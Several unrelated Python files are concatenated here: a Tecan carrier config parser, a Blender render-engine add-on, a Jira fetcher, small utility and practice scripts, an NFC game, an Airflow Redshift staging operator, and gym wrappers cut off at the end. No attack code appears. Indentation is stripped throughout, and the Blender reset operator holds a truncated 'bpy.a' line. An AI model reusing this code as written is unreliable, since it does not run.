typecode=int(fields[6])
if typecode==0:
carrier["type"]="Standard"
elif typecode==2:
carrier["type"]="Hidden"
elif typecode==-3:
carrier["type"]="ROMA"
elif typecode == 13:
carrier["type"] = "Carousel"
else:
print(f"Unknown carrier type code: {typecode} at line {lineno}")
carrier["type"]=typecode
self.carriers.append(carrier)
elif fields[0]=="15": # Racks
cont=[]
assert(int(fields[2])==0) # Unknown what it is, but always zero
rack = {"name":fields[1],
#"unk1":int(fields[2]),
"wells":[int(f) for f in fields[3].split("/")],
"wellpos":[int(f) for f in fields[4].split("/")],
"zcoords":{k: (2100-int(f))/10.0 for k, f in zip(['max','start','dispense','travel'], fields[5].split("/"))},
"area":float(fields[6]),
"tipsperwell":int(fields[7]),
"tiptouchdist":float(fields[8]),
"piercing":[int(f) for f in fields[9].split("/")],
"type":int(fields[10]),
"diti":{"capacity":float(fields[11]),"offset":float(fields[12])}, # TODO: int?
"depth":float(fields[13]),
"precise":{"active":int(fields[14]),"xstart":int(fields[15]),"ystart":int(fields[16]),"speed":float(fields[17])},
"npos": int(fields[18]),
"other":fields[19:],
"cont":cont}
self.racks.append(rack)
elif fields[0]=="17": # ROMA Vector
cont=[]
vector = {"name":fields[1],
"grip": {"gripdist":float(fields[2].split("/")[0])/10,
"reldist": float(fields[2].split("/")[1]) / 10,
"force": float(fields[2].split("/")[2]),
"speed": float(fields[2].split("/")[3]) / 10},
"xyzspeed": float(fields[3].split("/")[0])/10,
"rotspeed": float(fields[3].split("/")[1])/10,
"nsteps": int(fields[4]),
"carrierid": int(fields[5]),
"other":fields[6:],
"cont":cont}
self.vectors.append(vector)
elif fields[0]=="20":
#print(f"{fields[0]}: {fields[1]} {len(fields)-2}")
cont=[]
elif fields[0]=="998":
cont.append([int(fn) for f in fields[1:] for fn in f.split("/") ])
else:
print(f"Unknown field code {fields[0]} at line {lineno}")
# Clean up continutation lines
for v in self.vectors:
assert(v["nsteps"] == len(v["cont"]))
v["steps"]=[{"x":d[0]/10.0,"y":d[1],"z":d[2]/10.0,"r":(d[3]%10000)/10.0,"abs":d[3]>=10000} for d in v["cont"]]
del v["cont"]
del v["nsteps"] # Redundant
for c in self.carriers:
assert(c["nsites"]+1 == len(c["cont"]))
c["sites"]=[{"shape":d[0],"xsize":d[1]/10.0,"ysize":d[2]/10.0,"xoffset":d[3]/10.0,"yoffset":d[4]/10.0,"zoffset":d[5]/10.0} for d in c["cont"][:-1]]
c["cont"]=c["cont"][-1] # Unsure what this last line is for
del c["nsites"]
for r in self.racks:
assert(r["npos"] == len(r["cont"]))
r["allowed"]=[{"carrier":d[0],"positions":[p+1 for p in range(10) if d[1]&(1<<p)]} for d in r["cont"]]
if r["npos"]>0:
r["unk"]=r["cont"][-1][2]
del r["npos"]
del r["cont"]
@click.command()
@click.option('--filename','-f',help="File to load")
@click.option('--dump','-d',is_flag=True,help="Dump contents")
def main(filename,dump):
carrier = Carrier()
carrier.loadCFG(filename)
if dump:
carrier.print()
if __name__ == '__main__':
main()
|
import bpy
import bgl
import taichi as ti
import numpy as np
import tina
def calc_camera_matrices(depsgraph):
camera = depsgraph.scene.camera
render = depsgraph.scene.render
scale = render.resolution_percentage / 100.0
proj = np.array(camera.calc_matrix_camera(depsgraph,
x=render.resolution_x * scale, y=render.resolution_y * scale,
scale_x=render.pixel_aspect_x, scale_y=render.pixel_aspect_y))
view = np.linalg.inv(np.array(camera.matrix_world))
return view, proj
def bmesh_verts_to_numpy(bm):
arr = [x.co for x in bm.verts]
if len(arr) == 0:
return np.zeros((0, 3), dtype=np.float32)
return np.array(arr, dtype=np.float32)
def bmesh_faces_to_numpy(bm):
arr = [[e.index for e in f.verts] for f in bm.faces]
if len(arr) == 0:
return np.zeros((0, 3), dtype=np.int32)
return np.array(arr, dtype=np.int32)
def bmesh_face_norms_to_numpy(bm):
vnorms = [x.normal for x in bm.verts]
if len(vnorms) == 0:
vnorms = np.zeros((0, 3), dtype=np.float32)
else:
vnorms = np.array(vnorms)
norms = [
[vnorms[e.index] for e in f.verts]
if f.smooth else [f.normal for e in f.verts]
for f in bm.faces]
if len(norms) == 0:
return np.zeros((0, 3, 3), dtype=np.float32)
return np.array(norms, dtype=np.float32)
def bmesh_face_coors_to_numpy(bm):
uv_lay = bm.loops.layers.uv.active
if uv_lay is None:
return np.zeros((len(bm.faces), 3, 2), dtype=np.float32)
coors = [[l[uv_lay].uv for l in f.loops] for f in bm.faces]
if len(coors) == 0:
return np.zeros((0, 3, 2), dtype=np.float32)
return np.array(coors, dtype=np.float32)
def blender_get_object_mesh(object, depsgraph=None):
import bmesh
bm = bmesh.new()
if depsgraph is None:
depsgraph = bpy.context.evaluated_depsgraph_get()
object_eval = object.evaluated_get(depsgraph)
bm.from_object(object_eval, depsgraph)
bmesh.ops.triangulate(bm, faces=bm.faces)
verts = bmesh_verts_to_numpy(bm)[bmesh_faces_to_numpy(bm)]
norms = bmesh_face_norms_to_numpy(bm)
coors = bmesh_face_coors_to_numpy(bm)
return verts, norms, coors
class TinaMaterialPanel(bpy.types.Panel):
'''Tina material options'''
bl_label = 'Tina Material'
bl_idname = 'MATERIAL_PT_tina'
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = 'material'
def draw(self, context):
layout = self.layout
object = context.object
layout.prop_search(object, 'tina_material', bpy.data, 'node_groups')
layout.operator('scene.tina_reset')
class TinaLightPanel(bpy.types.Panel):
'''Tina light options'''
bl_label = 'Tina Light'
bl_idname = 'DATA_PT_tina'
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = 'data'
def draw(self, context):
layout = self.layout
object = context.object
if object.type == 'LIGHT':
layout.prop(object.data, 'tina_color')
layout.prop(object.data, 'tina_strength')
layout.operator('scene.tina_reset')
class TinaWorldPanel(bpy.types.Panel):
'''Tina world options'''
bl_label = 'Tina World'
bl_idname = 'WORLD_PT_tina'
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = 'world'
def draw(self, context):
layout = self.layout
world = context.scene.world
layout.prop(world, 'tina_color')
layout.prop(world, 'tina_strength')
layout.operator('scene.tina_reset')
class TinaRenderPanel(bpy.types.Panel):
'''Tina render options'''
bl_label = 'Tina Render'
bl_idname = 'RENDER_PT_tina'
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = 'render'
def draw(self, context):
layout = self.layout
options = context.scene.tina_render
layout.prop(options, 'render_samples')
layout.prop(options, 'viewport_samples')
layout.prop(options, 'start_pixel_size')
row = layout.row()
row.prop(options, 'smoothing')
row.prop(options, 'texturing')
layout.operator('scene.tina_reset')
class TinaRenderEngine(bpy.types.RenderEngine):
# These three members are used by blender to set up the
# RenderEngine; define its internal name, visible name and capabilities.
bl_idname = "TINA"
bl_label = "Tina"
bl_use_preview = True
# Init is called whenever a new render engine instance is created. Multiple
# instances may exist at the same time, for example for a viewport and final
# render.
def __init__(self):
self.scene_data = None
self.draw_data = None
self.object_to_mesh = {}
self.material_to_id = {}
self.nblocks = 0
self.nsamples = 0
self.viewport_samples = 16
# When the render engine instance is destroy, this is called. Clean up any
# render engine data here, for example stopping running render threads.
def __del__(self):
pass
def __setup_mesh_object(self, object, depsgraph):
print('adding mesh object', object.name, object.tina_material)
verts, norms, coors = blender_get_object_mesh(object, depsgraph)
world = np.array(object.matrix_world)
if not object.tina_material:
matr, mtlid = self.scene.materials[0], 0
else:
if object.tina_material not in self.material_to_id:
tree = bpy.data.node_groups[object.tina_material]
from .node_system import construct_material_output
matr = construct_material_output(tree)
self.material_to_id[object.tina_material] = len(self.scene.materials)
self.scene.materials.append(matr)
mtlid = self.material_to_id[object.tina_material]
self.object_to_mesh[object] = world, verts, norms, coors, mtlid
def __update_mesh_object(self, object, depsgraph):
print('updating mesh object', object.name)
verts, norms, coors = blender_get_object_mesh(object, depsgraph)
world = np.array(object.matrix_world)
if not object.tina_material:
matr, mtlid = self.scene.materials[0], 0
else:
if object.tina_material not in self.material_to_id:
tree = bpy.data.node_groups[object.tina_material]
from .node_system import construct_material_output
matr = construct_material_output(tree)
self.material_to_id[object.tina_material] = len(self.scene.materials)
self.scene.materials.append(matr)
mtlid = self.material_to_id[object.tina_material]
self.object_to_mesh[object] = world, verts, norms, coors, mtlid
def __setup_scene(self, depsgraph):
scene = depsgraph.scene
options = scene.tina_render
self.scene = tina.PTScene(
(self.size_x, self.size_y),
smoothing=options.smoothing,
texturing=options.texturing)
self.scene.lighting = tina.Lighting()
for object in depsgraph.ids:
if isinstance(object, bpy.types.Object):
if object.type == 'MESH':
self.__setup_mesh_object(object, depsgraph)
@ti.materialize_callback
def init_scene():
for world, verts, norms, coors, mtlid in self.object_to_mesh.values():
self.scene.add_mesh(world, verts, norms, coors, mtlid)
def __update_scene(self, depsgraph):
need_update = False
for update in depsgraph.updates:
object = update.id
if isinstance(object, bpy.types.Scene):
obj_to_del = []
for obj in self.object_to_mesh:
if obj.name not in object.objects:
# this object was deleted
print('delete object', obj)
obj_to_del.append(obj)
for obj in obj_to_del:
del self.object_to_mesh[obj]
need_update = True
if isinstance(object, bpy.types.Object):
if object.type == 'MESH':
self.__update_mesh_object(object, depsgraph)
need_update = True
if need_update:
self.scene.clear_objects()
for world, verts, norms, coors, mtlid in self.object_to_mesh.values():
self.scene.add_mesh(world, verts, norms, coors, mtlid)
self.scene.update()
self.__reset_samples(depsgraph.scene)
def __reset_samples(self, scene):
self.nsamples = 0
self.nblocks = scene.tina_render.start_pixel_size
# This is the method called by Blender for both final renders (F12) and
# small preview for materials, world and lights.
def render(self, depsgraph):
scene = depsgraph.scene
scale = scene.render.resolution_percentage / 100.0
self.size_x = int(scene.render.resolution_x * scale)
self.size_y = int(scene.render.resolution_y * scale)
view, proj = calc_camera_matrices(depsgraph)
self.__setup(depsgraph, proj @ view)
# Here we write the pixel values to the RenderResult
result = self.begin_result(0, 0, self.size_x, self.size_y)
nsamples = scene.tina_render.render_samples
for samp in range(nsamples):
self.update_stats('Rendering', f'{samp}/{nsamples} Samples')
self.update_progress((samp + .5) / nsamples)
if self.test_break():
break
self.scene.render()
img = self.scene.raw_img
#img = np.ones((self.size_x, self.size_y, 4))
img = np.ascontiguousarray(img.swapaxes(0, 1))
rect = img.reshape(self.size_x * self.size_y, 4).tolist()
# import code; code.interact(local=locals())
layer = result.layers[0].passes["Combined"]
layer.rect = rect
self.update_result(result)
else:
self.update_progress(1.0)
self.end_result(result)
def __setup(self, depsgraph, perspective):
ti.init(ti.gpu)
self.update_stats('Initializing', 'Loading scene')
self.__setup_scene(depsgraph)
self.update_stats('Initializing', 'Constructing tree')
self.scene.update()
self.scene.engine.set_camera(np.eye(4), np.array(perspective))
def __update_camera(self, perspective):
self.scene.engine.set_camera(np.eye(4), np.array(perspective))
# For viewport renders, this method gets called once at the start and
# whenever the scene or 3D viewport changes. This method is where data
# should be read from Blender in the same thread. Typically a render
# thread will be started to do the work while keeping Blender responsive.
def view_update(self, context, depsgraph):
print('view_update')
region = context.region
region3d = context.region_data
view3d = context.space_data
scene = depsgraph.scene
# Get viewport dimensions
dimensions = region.width, region.height
perspective = region3d.perspective_matrix.to_4x4()
self.size_x, self.size_y = dimensions
if not self.scene_data:
# First time initialization
self.scene_data = True
first_time = True
# Loop over all datablocks used in the scene.
print('setup scene')
self.__setup(depsgraph, perspective)
else:
first_time = False
print('update scene')
# Test which datablocks changed
for update in depsgraph.updates:
print("Datablock updated:", update.id.name)
self.__update_scene(depsgraph)
# Test if any material was added, removed or changed.
if depsgraph.id_type_updated('MATERIAL'):
print("Materials updated")
# Loop over all object instances in the scene.
if first_time or depsgraph.id_type_updated('OBJECT'):
for instance in depsgraph.object_instances:
pass
# For viewport renders, this method is called whenever Blender redraws
# the 3D viewport. The renderer is expected to quickly draw the render
# with OpenGL, and not perform other expensive work.
# Blender will draw overlays for selection and editing on top of the
# rendered image automatically.
def view_draw(self, context, depsgraph):
print('view_draw')
region = context.region
region3d = context.region_data
scene = depsgraph.scene
max_samples = scene.tina_render.viewport_samples
# Get viewport dimensions
dimensions = region.width, region.height
perspective = region3d.perspective_matrix.to_4x4()
# Bind shader that converts from scene linear to display space,
bgl.glEnable(bgl.GL_BLEND)
bgl.glBlendFunc(bgl.GL_ONE, bgl.GL_ONE_MINUS_SRC_ALPHA)
self.bind_display_space_shader(scene)
if not self.draw_data or self.draw_data.dimensions != dimensions \
or self.draw_data.perspective != perspective:
self.__reset_samples(scene)
self.__update_camera(perspective)
if self.nsamples < max_samples:
if self.nblocks > 1:
self.nsamples = 0
self.scene.clear()
else:
if self.nblocks == 1:
self.scene.clear()
self.nsamples += 1
self.scene.render(blocksize=self.nblocks)
self.draw_data = TinaDrawData(self.scene, dimensions, perspective,
self.nblocks)
self.update_stats('Rendering', f'{self.nsamples}/{max_samples} Samples')
if self.nsamples < max_samples or self.nblocks != 0:
self.tag_redraw()
self.nblocks //= 2
self.draw_data.draw()
self.unbind_display_space_shader()
bgl.glDisable(bgl.GL_BLEND)
class TinaDrawData:
def __init__(self, scene, dimensions, perspective, blocksize):
print('redraw!')
# Generate dummy float image buffer
self.dimensions = dimensions
self.perspective = perspective
width, height = dimensions
resx, resy = scene.res
if blocksize != 0:
resx //= blocksize
resy //= blocksize
pixels = np.empty(resx * resy * 3, np.float32)
scene._fast_export_image(pixels, blocksize)
self.pixels = bgl.Buffer(bgl.GL_FLOAT, resx * resy * 3, pixels)
# Generate texture
self.texture = bgl.Buffer(bgl.GL_INT, 1)
bgl.glGenTextures(1, self.texture)
bgl.glActiveTexture(bgl.GL_TEXTURE0)
bgl.glBindTexture(bgl.GL_TEXTURE_2D, self.texture[0])
bgl.glTexImage2D(bgl.GL_TEXTURE_2D, 0, bgl.GL_RGB16F, resx, resy, 0, bgl.GL_RGB, bgl.GL_FLOAT, self.pixels)
bgl.glTexParameteri(bgl.GL_TEXTURE_2D, bgl.GL_TEXTURE_MIN_FILTER, bgl.GL_NEAREST)
bgl.glTexParameteri(bgl.GL_TEXTURE_2D, bgl.GL_TEXTURE_MAG_FILTER, bgl.GL_NEAREST)
bgl.glTexParameteri(bgl.GL_TEXTURE_2D, bgl.GL_TEXTURE_WRAP_S, bgl.GL_CLAMP_TO_EDGE)
bgl.glTexParameteri(bgl.GL_TEXTURE_2D, bgl.GL_TEXTURE_WRAP_T, bgl.GL_CLAMP_TO_EDGE)
bgl.glBindTexture(bgl.GL_TEXTURE_2D, 0)
# Bind shader that converts from scene linear to display space,
# use the scene's color management settings.
shader_program = bgl.Buffer(bgl.GL_INT, 1)
bgl.glGetIntegerv(bgl.GL_CURRENT_PROGRAM, shader_program)
# Generate vertex array
self.vertex_array = bgl.Buffer(bgl.GL_INT, 1)
bgl.glGenVertexArrays(1, self.vertex_array)
bgl.glBindVertexArray(self.vertex_array[0])
texturecoord_location = bgl.glGetAttribLocation(shader_program[0], "texCoord")
position_location = bgl.glGetAttribLocation(shader_program[0], "pos")
bgl.glEnableVertexAttribArray(texturecoord_location)
bgl.glEnableVertexAttribArray(position_location)
# Generate geometry buffers for drawing textured quad
position = [0.0, 0.0, width, 0.0, width, height, 0.0, height]
position = bgl.Buffer(bgl.GL_FLOAT, len(position), position)
texcoord = [0.0, 0.0, 1.0, 0.0, 1.0, 1.0, 0.0, 1.0]
texcoord = bgl.Buffer(bgl.GL_FLOAT, len(texcoord), texcoord)
self.vertex_buffer = bgl.Buffer(bgl.GL_INT, 2)
bgl.glGenBuffers(2, self.vertex_buffer)
bgl.glBindBuffer(bgl.GL_ARRAY_BUFFER, self.vertex_buffer[0])
bgl.glBufferData(bgl.GL_ARRAY_BUFFER, 32, position, bgl.GL_STATIC_DRAW)
bgl.glVertexAttribPointer(position_location, 2, bgl.GL_FLOAT, bgl.GL_FALSE, 0, None)
bgl.glBindBuffer(bgl.GL_ARRAY_BUFFER, self.vertex_buffer[1])
bgl.glBufferData(bgl.GL_ARRAY_BUFFER, 32, texcoord, bgl.GL_STATIC_DRAW)
bgl.glVertexAttribPointer(texturecoord_location, 2, bgl.GL_FLOAT, bgl.GL_FALSE, 0, None)
bgl.glBindBuffer(bgl.GL_ARRAY_BUFFER, 0)
bgl.glBindVertexArray(0)
def __del__(self):
bgl.glDeleteBuffers(2, self.vertex_buffer)
bgl.glDeleteVertexArrays(1, self.vertex_array)
bgl.glBindTexture(bgl.GL_TEXTURE_2D, 0)
bgl.glDeleteTextures(1, self.texture)
def draw(self):
bgl.glActiveTexture(bgl.GL_TEXTURE0)
bgl.glBindTexture(bgl.GL_TEXTURE_2D, self.texture[0])
bgl.glBindVertexArray(self.vertex_array[0])
bgl.glDrawArrays(bgl.GL_TRIANGLE_FAN, 0, 4)
bgl.glBindVertexArray(0)
bgl.glBindTexture(bgl.GL_TEXTURE_2D, 0)
# RenderEngines also need to tell UI Panels that they are compatible with.
# We recommend to enable all panels marked as BLENDER_RENDER, and then
# exclude any panels that are replaced by custom panels registered by the
# render engine, or that are not supported.
def get_panels():
exclude_panels = {
'VIEWLAYER_PT_filter',
'VIEWLAYER_PT_layer_passes',
}
panels = []
for panel in bpy.types.Panel.__subclasses__():
if hasattr(panel, 'COMPAT_ENGINES') and 'BLENDER_RENDER' in panel.COMPAT_ENGINES:
if panel.__name__ not in exclude_panels:
panels.append(panel)
return panels
class TinaRenderProperties(bpy.types.PropertyGroup):
render_samples: bpy.props.IntProperty(name='Render Samples', min=1, default=128)
viewport_samples: bpy.props.IntProperty(name='Viewport Samples', min=1, default=32)
start_pixel_size: bpy.props.IntProperty(name='Start Pixel Size', min=1, default=8)
smoothing: bpy.props.BoolProperty(name='Smoothing', default=True)
texturing: bpy.props.BoolProperty(name='Texturing', default=True)
class TinaResetOperator(bpy.types.Operator):
'''Reset Tina Renderer'''
bl_idname = "scene.tina_reset"
bl_label = "Reset Tina"
@classmethod
def poll(cls, context):
return True
def execute(self, context):
bpy.a
return {'FINISHED'}
def register():
bpy.utils.register_class(TinaRenderProperties)
bpy.types.Object.tina_material = bpy.props.StringProperty(name='Material')
bpy.types.Light.tina_color = bpy.props.FloatVectorProperty(name='Color', subtype='COLOR', min=0, max=1, default=(1, 1, 1))
bpy.types.Light.tina_strength = bpy.props.FloatProperty(name='Strength', min=0, default=16)
bpy.types.World.tina_color = bpy.props.FloatVectorProperty(name='Color', subtype='COLOR', min=0, max=1, default=(0.04, 0.04, 0.04))
bpy.types.World.tina_strength = bpy.props.FloatProperty(name='Strength', min=0, default=1)
bpy.types.World.tina_strength = bpy.props.FloatProperty(name='Strength', min=0, default=1)
bpy.types.Scene.tina_render = bpy.props.PointerProperty(name='tina', type=TinaRenderProperties)
bpy.utils.register_class(TinaRenderEngine)
bpy.utils.register_class(TinaResetOperator)
bpy.utils.register_class(TinaMaterialPanel)
bpy.utils.register_class(TinaLightPanel)
bpy.utils.register_class(TinaWorldPanel)
bpy.utils.register_class(TinaRenderPanel)
for panel in get_panels():
panel.COMPAT_ENGINES.add('TINA')
def unregister():
bpy.utils.unregister_class(TinaRenderEngine)
bpy.utils.unregister_class(TinaResetOperator)
bpy.utils.unregister_class(TinaMaterialPanel)
bpy.utils.unregister_class(TinaLightPanel)
bpy.utils.unregister_class(TinaWorldPanel)
bpy.utils.unregister_class(TinaRenderPanel)
for panel in get_panels():
if 'TINA' in panel.COMPAT_ENGINES:
panel.COMPAT_ENGINES.remove('TINA')
del bpy.types.Object.tina_material
del bpy.types.Light.tina_color
del bpy.types.Light.tina_strength
del bpy.types.World.tina_color
del bpy.types.World.tina_strength
del bpy.types.Scene.tina_render
bpy.utils.unregister_class(TinaRenderProperties)
|
import json
from functools import partial
from dateutil.parser import parse
from xml.etree import ElementTree as ET
from pyramid.decorator import reify
from intranet3.asyncfetchers.base import (BaseFetcher, CSVParserMixin,
SimpleProtocol, BasicAuthMixin,
FetchException, Bug, cached_bug_fetcher)
from intranet3 import helpers as h
from intranet3.log import EXCEPTION_LOG, INFO_LOG
LOG = INFO_LOG(__name__)
EXCEPTION = EXCEPTION_LOG(__name__)
class JiraBug(Bug):
def get_url(self, number=None):
number = number if number else self.id
return self.tracker.url + '/ViewIssue.jspa?id=%(id)s' % {'id': number}
def is_unassigned(self):
return not self.owner
@reify
def is_blocked(self):
for bug_data in self.dependson.values():
if bug_data.get('resolved', True) is False:
return True
return False
def get_status(self):
return self.status
def get_resolution(self):
return self.resolution
def _fetcher_function(resolved, single):
@cached_bug_fetcher(lambda: u'resolved-%s-single-%s' % (resolved, single))
def fetcher(self):
jql_params = []
if resolved:
jql_params.append('status=done')
else:
jql_params.append('status!=done')
if single:
jql_params.append('assignee=' + self.login)
jql = '+AND+'.join(jql_params)
url = '%(url)s/rest/api/2/search?jql=%(jql)s&fields=%(fields)s' % \
{'url': self.tracker.url,
'jql': jql,
'fields': self.get_fields_list()}
self.fetch_get(url)
return fetcher
def _query_fetcher_function(resolved=False, all=False):
def fetcher(self, ticket_ids, project_selector, component_selector,
version):
jql_params = ['project=' + project_selector]
if component_selector:
jql_params.append(build_query_alternative('component',
component_selector))
if version:
jql_params.append(build_query_alternative('affectedVersion',
version))
if ticket_ids:
jql_params.append(build_query_alternative('id', ticket_ids))
if not all:
if resolved:
jql_params.append('status=done')
else:
jql_params.append('status!=done')
jql = '+AND+'.join(jql_params)
url = '%(url)s/rest/api/2/search?jql=%(jql)s&fields=%(fields)s' % \
{'url': self.tracker.url,
'jql': jql,
'fields': self.get_fields_list()}
self.fetch_get(url)
return fetcher
def build_query_alternative(field, data):
params = []
for item in data:
params.append(field + '=' + item)
return '(' + '+OR+'.join(params) + ')'
def get_blocked(d):
links = filter(
lambda l: l['type']['id'] == '10000' and 'outwardIssue' in l,
d['fields']['issuelinks'])
links = map(lambda l: l['outwardIssue'], links)
return dict(map(lambda t: (t['id'], {'desc': t['fields']['summary'],
'resolved': t['fields']['status']['id'] == '10000'}), links))
jira_converter = h.Converter(
id=lambda d: d['id'],
desc=lambda d: d['fields']['summary'],
reporter=lambda d: d['fields']['reporter']['name'],
owner=lambda d: d['fields']['assignee']['name'] if d['fields']['assignee']
else '',
priority=lambda d: d['fields']['priority']['name'],
severity=lambda d: d['fields']['priority']['name'],
status=lambda d: d['fields']['status']['name'],
resolution=lambda d: d['fields']['resolution'],
project_name=lambda d: d['fields']['project']['name'],
component_name=lambda d: ', '.join(map(lambda c: c['name'], d['fields']
['components'])),
deadline=lambda d: parse(d['fields']['duedate']) if d['fields']['duedate']
else '',
opendate=lambda d: parse(d['fields']['created']),
changeddate=lambda d: parse(d['fields']['updated']) if d['fields']
['updated'] else '',
labels=lambda d: d['fields']['labels'],
dependson=lambda d: dict(map(lambda t: (t['id'], {'desc': t['fields']
['summary'], 'resolved': t['fields']['status']['id'] == '10000'}),
d['fields']['subtasks'])),
blocked=get_blocked
)
class JiraFetcher(BasicAuthMixin, CSVParserMixin, BaseFetcher):
""" Fetcher for Jira bugs """
bug_class = JiraBug
get_converter = lambda self: jira_converter
FIELDS = ['summary', 'reporter', 'assignee', 'priority', 'status',
'resolution', 'project', 'components', 'duedate', 'created', 'updated',
'labels', 'subtasks', 'issuelinks']
def fetch_get(self, url, on_success=None):
if not on_success:
on_success = self.responded
url = url.encode('utf-8')
headers = self.get_headers()
self.request(url, headers, on_success, method='GET')
def parse(self, data):
converter = self.get_converter()
json_data = json.loads(data)
for bug_desc in json_data['issues']:
yield self.bug_class(
tracker=self.tracker,
**converter(bug_desc)
)
def get_fields_list(self):
return ','.join(self.FIELDS)
fetch_user_tickets = _fetcher_function(resolved=False, single=True)
fetch_all_tickets = _fetcher_function(resolved=False, single=False)
fetch_user_resolved_tickets = _fetcher_function(resolved=True, single=True)
fetch_all_resolved_tickets = _fetcher_function(resolved=True, single=False)
fetch_bugs_for_query = _query_fetcher_function(resolved=False)
fetch_resolved_bugs_for_query = _query_fetcher_function(resolved=True)
fetch_all_bugs_for_query = _query_fetcher_function(all=True)
|
#!/usr/bin/env python
import os
import glob
cur_dir = os.getcwd()
dir_content = os.listdir(cur_dir)
for content in dir_content:
print content
def createTestDir(dir_name):
os.mkdir(dir_name)
os.chdir(dir_name)
f = open('testfile.txt','w')
f.close()
os.listdir(dir_name)
print("Running test dir first time")
dir_name = os.path.join('/Users/vlasp/src/amzn/feabhas_python/TestDirectory')
createTestDir(dir_name)
def addFiles(dir_name):
os.chdir(dir_name)
f = open('file1.txt','w')
f.close()
f = open('file2.txt','w')
f.close()
f = open('file3.py','w')
f.close()
f = open('file4.py','w')
f.close()
print("Adding files to the dir")
dir_name = os.path.join('/Users/vlasp/src/amzn/feabhas_python/TestDirectory')
addFiles(dir_name)
print glob.glob(os.path.join(dir_name,'*.txt'))
print("Running test dir second time")
createTestDir('TestDirectory')
|
from models.company import Company
class DataStorage:
def __init__(self):
self.companies = []
self.jobs = []
self.job_tags = [] # List of tuples (job_tag, id)
def add_job_tag(self, j):
if j not in self.job_tags:
self.job_tags.append(j)
return True
return False
def add_job_to_company(self, job):
self.get_company(job['company_id']).jobs.append(job)
def add_jobtag_to_company(self, job_tag, company_id):
self.get_company(company_id).job_tags.append(job_tag)
def add_company(self, company):
if company.id not in [company.id for company in self.companies]:
self.companies.append(company)
return True
return False
def get_company(self, companyid):
for co in self.companies:
if companyid == co.id:
return co
return None
def check_company_exists(self, companyid):
return companyid in [co.id for co in self.companies]
def save_available_jobs_CSV(self):
# Create CSV output
try:
string = ''
for company in self.companies:
for job in company.jobs:
string += f'{company.name},{job.title}\n'
# print(f'{company.name}, {job.title}')
except Exception as e:
print(e)
return False
return Utils.save_to_txt(f'open_positions.csv', string)
# TODO: Save data into a json template
def save_data_json(self):
#Save all relevant information to a json file
data = [company.get_Company_dict() for company in self.companies]
return Utils.save_to_json(f'alldata.json', data) |
#!/usr/bin/env python
# coding: utf-8
import nfc
import time
import vlc
import os
#初期設定
p = vlc.MediaPlayer()
count = 0
loop = 0
#財宝を判定する
def connected(tag):
global count
global loop
print str(count+1) + "回目"
judge = str(tag.identifier).encode('hex').upper()
#本物の財宝の場合
if judge == '04808D72845C81':
if judge != loop:
print "正解"
p.set_mrl('')
p.play()
p.set_time(15000)
p.stop()
loop = judge
print "本物の財宝が乗っています"
count += 1
time.sleep(1)
#偽物の財宝の場合
else:
if judge != loop:
print "不正解"
p.set_mrl('')
p.play()
p.set_time(1000)
p.stop()
loop = judge
print "偽物の財宝が乗っています"
count += 1
time.sleep(1)
#プロセスID表示
print "プロセスID:" + str(os.getpid())
#財宝を感知した時
while True:
clf = nfc.ContactlessFrontend('usb')
clf.connect(rdwr={'on-connect': connected})
clf = ""
print "ゲームオーバー"
|
from airflow.hooks.postgres_hook import PostgresHook
from airflow.models import BaseOperator
from airflow.utils.decorators import apply_defaults
from airflow.contrib.hooks.aws_hook import AwsHook
class StageToRedshiftOperator(BaseOperator):
ui_color = '#358140'
template_fields = ("s3_path",)
@apply_defaults
def __init__(self,
redshift_conn_id="",
aws_credentials_id="",
table_name="",
s3_path="",
region="",
json_format="auto",
*args, **kwargs):
super(StageToRedshiftOperator, self).__init__(*args, **kwargs)
self.table_name = table_name
self.redshift_conn_id = redshift_conn_id
self.s3_path = s3_path
self.region= region
self.json_format = json_format
self.aws_credentials_id = aws_credentials_id
self.execution_date = kwargs.get('execution_date')
self.kwargs = kwargs
def execute(self, context):
"""
Performs copy procedure from S3 to AWS Redshift.
"""
# initialize aws hook to get user credentials
aws_hook = AwsHook(self.aws_credentials_id)
credentials = aws_hook.get_credentials()
# constructing query for aws redshift
query = f"""copy {self.table_name} from '{self.s3_path}'
access_key_id '{credentials.access_key}'
secret_access_key '{credentials.secret_key}'
compupdate off region '{self.region}'
timeformat as 'epochmillisecs'
truncatecolumns blanksasnull emptyasnull
format as json '{self.json_format}';
"""
# executing aws redshift query
self.log.info(f'Staging table {self.table_name} to AWS Redshift...')
redshift_hook = PostgresHook(postgres_conn_id = self.redshift_conn_id)
redshift_hook.run(query)
self.log.info(f"Table {self.table_name} staged successfully!")
|
import numpy as np
from math import ceil, floor
def rolling_window(image, window_size, stride):
'''
Image is a (X, Y) size array to apply rolling window on
window_size is a tuple containing (winX, winY)
stride is a tuple containing (dX, dY)
Returns an array of size (nX, nY, winX, winY)
where nX, nY are the indices of the window at the position
'''
X, Y = image.shape
winX, winY = window_size
dX, dY = stride
nX = (X - winX) // dX + 1
nY = (Y - winY) // dY + 1
arr = np.zeros(shape = (nX, nY, winX, winY))
for i in range(0, nX):
for j in range(0, nY):
x = i * dX
y = j * dY
arr[i, j, :, :] = image[ x : x + winX, y : y + winY]
return arr
def get_stride(image_size, window_size, coverage = 0.5):
X, Y = image_size
wX, wY = window_size
sX = _get_stride_calc(X, wX, coverage)
sY = _get_stride_calc(Y, wY, coverage)
return sX, sY
def _get_stride_calc(img, win, coverage):
n_wins = ceil( (img - win) / floor(win * coverage) )
return floor( (img - win) / n_wins ) |
'''
From https://github.com/colinskow/move37/blob/master/dqn/lib/wrappers.py
'''
import cv2
import gym
import gym.spaces
import numpy as np
import collections
import asyncio
class NoopResetEnv(gym.Wrapper):
def __init__(self, env, noop_max=30):
"""Sample initial states by taking random number of no-ops on reset.
No-op is assumed to be action 0.
"""
gym.Wrapper.__init__(self, env)
self.noop_max = noop_max
self.override_num_noops = None
self.noop_action = 0
assert env.unwrapped.get_action_meanings()[0] == 'NOOP'
def reset(self, **kwargs):
""" Do no-op action for a number of steps in [1, noop_max]."""
self.env.reset(**kwargs)
if self.override_num_noops is not None:
noops = self.override_num_noops
else:
noops = self.unwrapped.np_random.randint(1, self.noop_max + 1) #pylint: disable=E1101
assert noops > 0
obs = None
for _ in range(noops):
obs, _, done, _ = self.env.step(self.noop_action)
if done:
obs = self.env.reset(**kwargs)
return obs
def step(self, ac):
return self.env.step(ac)
class MaxAndSkipEnv(gym.Wrapper):
